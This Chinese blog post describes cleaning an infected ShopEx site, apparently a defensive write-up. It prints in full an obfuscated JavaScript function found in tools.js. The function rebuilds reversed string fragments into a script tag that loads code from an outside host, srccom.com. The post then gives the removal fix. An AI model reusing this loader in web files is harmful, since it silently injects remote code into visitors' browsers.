生活就是个缓慢受锤的过程,人一天天老下去,奢望也一天天消失,最后变得像挨了锤的牛一样

shopex被挂马导致访问缓慢的解决办法

时间: 2014-05-22
分类: Web服务器,程序,安全
阅读:(596)

shopex网站速度缓慢，通过firefox浏览器跟踪网络请求，页面调用了一个地址http://srccom.com/SRC.SRC，
发现网站程序的/statics/script/tools.js里被嵌入了恶意函数

function CurrentXmlFrmFocus(){

      var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];

      var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];

      var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];

      var strgAttribute=”";

      ardPopOpacity=ardPopOpacity.concat(arnElement);

      for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);

      document.writeln(strgAttribute);

}

函数最终会拼接出一段完整的script标签

<script SRC=’http://srccom.com/SRC.SRC’></script>

解决办法
删除掉这串函数，或者使用shopex最新安装包中的文件上传替换它。

标签: php, 安全, shopex, 程序

ClamAV安装使用详解（发布时间: 2021-06-30）
sdalog命令查看网站安全狗apache版日志（发布时间: 2015-12-25）
输出站点统计（发布时间: 2015-12-18）
带统计的标签云（发布时间: 2015-12-18）
typecho浏览统计插件（发布时间: 2015-12-09）

shopex被挂马导致访问缓慢的解决办法

评论已关闭

站点信息

最新日志

分类

归档

标签

其它

友情链接